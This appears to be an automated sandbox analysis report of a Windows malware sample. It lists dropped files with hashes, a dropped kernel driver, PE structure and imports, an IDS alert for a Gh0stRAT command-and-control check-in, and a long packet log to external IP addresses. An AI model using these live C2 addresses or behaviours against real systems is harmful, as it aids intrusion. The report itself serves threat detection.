                                                                            Malicious:true
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d... .E .E .Ek..D%.Ek..D..Ek..D*.E0N.D).E0N.D..E0N.D..Ek..D#.E .EB.EhO.D!.EhO.D!.EhOHE!.E . E!.EhO.D!.ERich .E........PE..d....w.g.........." ...).....................................................0............`.........................................`...........(.......H.................... ..x... ...8...............................@............ ...............................text............................... ..`.rdata....... ......................@..@.data...0...........................@....pdata..............................@..@.rsrc...H...........................@..@.reloc..x.... ......................@..B........................................................................................................................................................................................................................................

                                                                            C:\Windows\System32\drivers\189atohci.sys

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\2873466535874-68348745.02.exe
                                                                            File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):28272
                                                                            Entropy (8bit):6.228993238475549
                                                                            Encrypted:false
                                                                            SSDEEP:384:a3YUY30d1Kgf4AtcTmwZ/22a97C5ohYh3IB96Oys2+l0skiM0HMFrba8no0ceD/D:aOUkgfdZ9pRyv+uPzCMHo3q4tDgh1
                                                                            MD5:6ECE66ADEDC7FDC9DB6589E09D7C338C
                                                                            SHA1:9669737BD452D7098D999C60C0BC7282FAF0B52F
                                                                            SHA-256:DA28406D0B394C7730DCA55616A7E4D54DFBCCE9FE43F06B43AF98872577AD29
                                                                            SHA-512:CC34C70059AFF38CFC3A118809E58C65A673FCF3A668CBC1043847E1A3778E5E2E58D5C3F0481374DA97235961161F7D97457F8AECC99C278B5306F555A6DF26
                                                                            Malicious:true
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ri...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:Rich...:........................PE..d....S.V.........."......:..........l...........................................................................................................(............`.......P..p.......D....A...............................................@...............................text....,.......................... ..h.rdata.......@.......2..............@..H.data........P.......:..............@....pdata.......`.......<..............@..HPAGE....l....p.......>.............. ..`INIT.................@.............. ....rsrc................J..............@..B.reloc...............N..............@..B........................................................................................................................................................................................

                                                                            C:\xxxx.ini

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):2
                                                                            Entropy (8bit):1.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:y:y
                                                                            MD5:81051BCC2CF1BEDF378224B0A93E2877
                                                                            SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                                                            SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                                                            SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                                                            Malicious:false
                                                                            Preview:..

                                                                            \Device\Mup\localhost\pipe\atsvc

                                                                            Download File
                                                                            Process:C:\Program Files (x86)\bmaosk\bmaosk.exe
                                                                            File Type:GLS_BINARY_LSB_FIRST
                                                                            Category:dropped
                                                                            Size (bytes):298
                                                                            Entropy (8bit):4.423937176257418
                                                                            Encrypted:false
                                                                            SSDEEP:3:ri9Jfnvl//lll1siQg4d1ywsiQI5kZt8jtl/zi8tkHsl9/CEv2lfpXIAuUWKznlS:ri9J9TwPYtyjtOsXmPYA4oivn3
                                                                            MD5:FE9E34638B1EBB3CC71275767FA7D331
                                                                            SHA1:C8718216C7A7E83EFEBD1D937FF49CAC470795A4
                                                                            SHA-256:3A0F01048EF84F190C894FB60762FF66689966CF8DEB62D9B064A048578D3C9B
                                                                            SHA-512:B13B6D887912C8A1EE1CB3B887957D8CB961B2407F19EB3C0CD569A274A06939D2C0444354CAE4F95977075243FE82C8AFB1AC68B61183381A9B078AF566B43F
                                                                            Malicious:false
                                                                            Preview:..........:.....................IY..D@.$.621.......]..........+.H`........IY..D@.$.621......,..l..@E....................NTLMSSP.............1.......(.....aJ....user-PCWORKGROUP........t.X.................NTLMSSP.........X.......X.......X.......X.......X.......X...5....aJ.....i...DU...?.~...

                                                                            Static File Info

                                                                            General

                                                                            File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                            Entropy (8bit):0.10663614932948126
                                                                            TrID:
                                                                            • Win64 Executable GUI (202006/5) 92.65%
                                                                            • Win64 Executable (generic) (12005/4) 5.51%
                                                                            • Generic Win/DOS Executable (2004/3) 0.92%
                                                                            • DOS Executable Generic (2002/1) 0.92%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                            File name:2873466535874-68348745.02.exe
                                                                            File size:30'940'160 bytes
                                                                            MD5:988a0f183ed996dbfcbf7a7a9febd75b
                                                                            SHA1:8cdba1b439da0c0213a0c63c4a9a3128a365c429
                                                                            SHA256:0daf81269428bfae28ae44dd57cda9903b93136b97d40552034e715bdb75a153
                                                                            SHA512:a0ec1c2f2cf9374cd96e91b66999d49403d02ead00794b298a1760c49afb1001aef87fa3bd9ff7da832a18e3e27438d9607697487bf6eda7543ca0dc1186ec3c
                                                                            SSDEEP:3072:NpOiqw9LigALMxNkVQnCo8fji+pJ5m0tZedMeej1l9GQaebbd5cQClGX:Rqw9L4WNkVQ2jN3cIlY7kulG
                                                                            TLSH:4F679D2217ECA8E4D1668178C4215B48A776FC310739AFEF42A43596DE773D28D3AB13
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........u................W.......U.......T.....NM......NM......NM......v.m.............YM......YM......Rich............PE..d...'d.X...

                                                                            File Icon

                                                                            Icon Hash:0f496c6869691b0f

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint:0x140004b70
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:true
                                                                            Imagebase:0x140000000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                            DLL Characteristics:HIGH_ENTROPY_VA, TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x580E6427 [Mon Oct 24 19:42:31 2016 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:6
                                                                            OS Version Minor:0
                                                                            File Version Major:6
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:6
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:e18f083032bd63ef578ff4924029acd9

                                                                            Authenticode Signature

                                                                            Signature Valid:
                                                                            Signature Issuer:
                                                                            Signature Validation Error:
                                                                            Error Number:
                                                                            Not Before, Not After
                                                                              Subject Chain
                                                                                Version:
                                                                                Thumbprint MD5:
                                                                                Thumbprint SHA-1:
                                                                                Thumbprint SHA-256:
                                                                                Serial:

                                                                                Entrypoint Preview

                                                                                Instruction
                                                                                dec eax
                                                                                sub esp, 28h
                                                                                call 00007FDF50BADB58h
                                                                                dec eax
                                                                                add esp, 28h
                                                                                jmp 00007FDF50BA9C38h
                                                                                int3
                                                                                int3
                                                                                jmp 00007FDF50BB0424h
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                inc eax
                                                                                push ebx
                                                                                dec eax
                                                                                sub esp, 20h
                                                                                dec eax
                                                                                mov ebx, ecx
                                                                                jmp 00007FDF50BAD703h
                                                                                dec eax
                                                                                mov ecx, ebx
                                                                                call 00007FDF50BB041Eh
                                                                                test eax, eax
                                                                                jne 00007FDF50BAD6F4h
                                                                                dec eax
                                                                                cmp ebx, FFFFFFFFh
                                                                                jne 00007FDF50BAD6E9h
                                                                                call 00007FDF50BAE067h
                                                                                jmp 00007FDF50BAD6E7h
                                                                                call 00007FDF50BAE040h
                                                                                dec eax
                                                                                mov ecx, ebx
                                                                                call 00007FDF50BB0474h
                                                                                dec eax
                                                                                test eax, eax
                                                                                je 00007FDF50BAD6B7h
                                                                                dec eax
                                                                                add esp, 20h
                                                                                pop ebx
                                                                                ret
                                                                                inc eax
                                                                                push ebx
                                                                                dec eax
                                                                                sub esp, 20h
                                                                                dec eax
                                                                                mov ebx, ecx
                                                                                xor ecx, ecx
                                                                                call dword ptr [0000A4EFh]
                                                                                dec eax
                                                                                mov ecx, ebx
                                                                                call dword ptr [0000A4DEh]
                                                                                call dword ptr [0000A4E8h]
                                                                                dec eax
                                                                                mov ecx, eax
                                                                                mov edx, C0000409h
                                                                                dec eax
                                                                                add esp, 20h
                                                                                pop ebx
                                                                                dec eax
                                                                                jmp dword ptr [0000A4DCh]
                                                                                dec eax
                                                                                mov dword ptr [esp+08h], ecx
                                                                                dec eax
                                                                                sub esp, 38h
                                                                                mov ecx, 00000017h
                                                                                call 00007FDF50BB6F64h
                                                                                test eax, eax
                                                                                je 00007FDF50BAD6E9h
                                                                                mov ecx, 00000002h
                                                                                int 29h
                                                                                dec eax
                                                                                lea ecx, dword ptr [00014E5Fh]
                                                                                call 00007FDF50BAD78Fh
                                                                                dec eax
                                                                                mov eax, dword ptr [esp+38h]
                                                                                dec eax
                                                                                mov dword ptr [00014F46h], eax
                                                                                dec eax
                                                                                lea eax, dword ptr [esp+38h]

                                                                                Rich Headers

                                                                                Programming Language:
                                                                                • [C++] VS2015 build 23026
                                                                                • [LNK] VS2015 build 23026

                                                                                Data Directories

                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x179040x78.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x1d750000x111d4.rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1d740000xd44.pdata
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x1d70a000x17c0.data
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x1d870000x638.reloc
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x166500x54.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x166b00x94.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0xf0000x2b8.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                Sections

                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                .text0x10000xd8a00xda0002c3167ff66540bdfec4f5a09585d571False0.5437571674311926data6.327711612498655IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                .rdata0xf0000x92680x940064da4bc9a526427216d344798ca8f0ceFalse0.4281566722972973data4.725795395377658IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .data0x190000x1d5ac780x1d58200fb0cd2c8e7948f644dcab6e35d1d12a4unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                .pdata0x1d740000xd440xe00af11063ff924f823191116f7802278caFalse0.45870535714285715data4.664275994918647IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .rsrc0x1d750000x111d40x112008ad4cfee590f5afc2f65a911a151c4fcFalse0.5855098083941606data6.54918147016501IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .reloc0x1d870000x6380x80033a44b362bbcdf115bab966a1b8bb954False0.53759765625data4.817070134893097IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                Resources

                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                RT_ICON0x1d752380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.6436170212765957
                                                                                RT_ICON0x1d756a00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0EnglishUnited States0.47827868852459016
                                                                                RT_ICON0x1d760280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.4308161350844278
                                                                                RT_ICON0x1d770d00x1a68Device independent bitmap graphic, 40 x 80 x 32, image size 0EnglishUnited States0.39437869822485205
                                                                                RT_ICON0x1d78b380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.31981327800829873
                                                                                RT_ICON0x1d7b0e00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 0EnglishUnited States0.2630491261218706
                                                                                RT_ICON0x1d7f3080x6dbaPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9807760768956925
                                                                                RT_RCDATA0x1d860c40x62dataEnglishUnited States0.7448979591836735
                                                                                RT_RCDATA0x1d861280x44dataEnglishUnited States0.6911764705882353
                                                                                RT_GROUP_ICON0x1d8616c0x68dataEnglishUnited States0.7596153846153846

                                                                                Imports

                                                                                DLLImport
                                                                                KERNEL32.dllGetLastError, WaitForSingleObject, GetExitCodeProcess, CreateProcessW, GetModuleFileNameW, CloseHandle, LockResource, SizeofResource, LoadLibraryW, FindResourceW, LoadResource, CreateFileW, WriteConsoleW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, HeapReAlloc, HeapSize, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwindEx, RtlPcToFileHeader, RaiseException, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, GetStdHandle, WriteFile, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, HeapFree, HeapAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap, VirtualAlloc
                                                                                USER32.dllwsprintfW, MessageBoxW
                                                                                SHELL32.dllShellExecuteExW
                                                                                SHLWAPI.dllPathCombineW, PathRemoveFileSpecW, PathCanonicalizeW
                                                                                ADVAPI32.dllSystemFunction036

                                                                                Possible Origin

                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                EnglishUnited States

                                                                                Network Behavior

                                                                                Suricata IDS Alerts

                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                2025-01-10T02:27:47.526813+01002852901ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin1192.168.2.5499918.217.59.2228917TCP

                                                                                Network Port Distribution

                                                                                TCP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Jan 10, 2025 02:26:16.713331938 CET49704443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:16.713434935 CET4434970439.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:16.713524103 CET49704443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:16.771326065 CET49704443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:16.771349907 CET4434970439.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:18.038949966 CET4434970439.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:18.039074898 CET49704443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:18.040533066 CET4434970439.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:18.040601015 CET49704443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:18.147012949 CET49704443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:18.147061110 CET4434970439.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:18.148236036 CET4434970439.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:18.148330927 CET49704443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:18.154145002 CET49704443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:18.195339918 CET4434970439.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:18.476830959 CET4434970439.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:18.476933956 CET49704443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:18.476977110 CET4434970439.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:18.477014065 CET4434970439.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:18.477051973 CET49704443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:18.477092028 CET49704443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:18.494954109 CET49704443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:18.495002985 CET4434970439.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:18.620187044 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:18.620233059 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:18.620321035 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:18.620563030 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:18.620577097 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:19.886291981 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:19.886348963 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:19.886758089 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:19.886771917 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:19.886930943 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:19.886936903 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:20.226443052 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:20.226475000 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:20.226500034 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:20.226522923 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:20.226537943 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:20.226540089 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:20.226574898 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:20.226582050 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:20.226600885 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:20.226625919 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:20.228173018 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:20.228229046 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:20.232764959 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:20.232822895 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:20.316772938 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:20.316860914 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:20.316862106 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:20.316876888 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:20.316905022 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:20.316931009 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:20.317370892 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:20.317419052 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:20.317895889 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:20.317944050 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:20.318553925 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:20.318603039 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:20.319063902 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:20.319111109 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:20.320555925 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:20.320604086 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:20.320728064 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:20.320779085 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:20.323571920 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:20.323642015 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:20.407583952 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:20.407654047 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:20.407664061 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:20.407675982 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:20.407689095 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:20.407715082 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:20.407720089 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:20.407737017 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:20.407759905 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:20.407785892 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:20.407927990 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:20.407974005 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:20.407984018 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:20.408027887 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:20.408126116 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:20.408171892 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:20.408963919 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:20.409007072 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:20.409025908 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:20.409033060 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:20.409045935 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:20.409068108 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:20.409480095 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:20.409532070 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:20.409738064 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:20.409786940 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:20.410110950 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:20.410162926 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:20.410239935 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:20.410284996 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:20.410298109 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:20.410306931 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:20.410362005 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:20.410362005 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:20.411187887 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:20.411312103 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:20.414033890 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:20.414077997 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:20.454698086 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:20.454760075 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:20.498286963 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:20.498339891 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:20.498362064 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:20.498374939 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:20.498403072 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:20.498423100 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:20.498496056 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:20.498539925 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:20.498586893 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:20.498630047 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:20.498636007 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:20.498672009 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:20.498678923 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:20.498712063 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:20.498719931 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:20.498754978 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:20.518049002 CET49705443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:20.518071890 CET4434970539.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:20.545849085 CET49706443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:20.545945883 CET4434970639.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:20.546032906 CET49706443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:20.546350002 CET49706443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:20.546386957 CET4434970639.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:21.780142069 CET4434970639.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:21.780225039 CET49706443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:21.781438112 CET49706443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:21.781466961 CET4434970639.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:21.781608105 CET49706443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:21.781620979 CET4434970639.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:22.107490063 CET4434970639.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:22.107547045 CET4434970639.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:22.107553959 CET49706443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:22.107580900 CET4434970639.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:22.107598066 CET49706443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:22.107647896 CET49706443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:22.107649088 CET4434970639.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:22.107676983 CET4434970639.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:22.107712030 CET49706443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:22.107966900 CET49706443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:22.108566999 CET4434970639.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:22.108638048 CET49706443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:22.359899998 CET4434970639.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:22.360029936 CET4434970639.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:22.360071898 CET4434970639.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:22.360073090 CET49706443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:22.360110044 CET4434970639.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:22.360141039 CET49706443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:22.360141039 CET49706443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:22.360171080 CET49706443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:22.360883951 CET4434970639.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:22.360960007 CET49706443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:22.361675024 CET4434970639.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:22.361732960 CET4434970639.103.20.42192.168.2.5
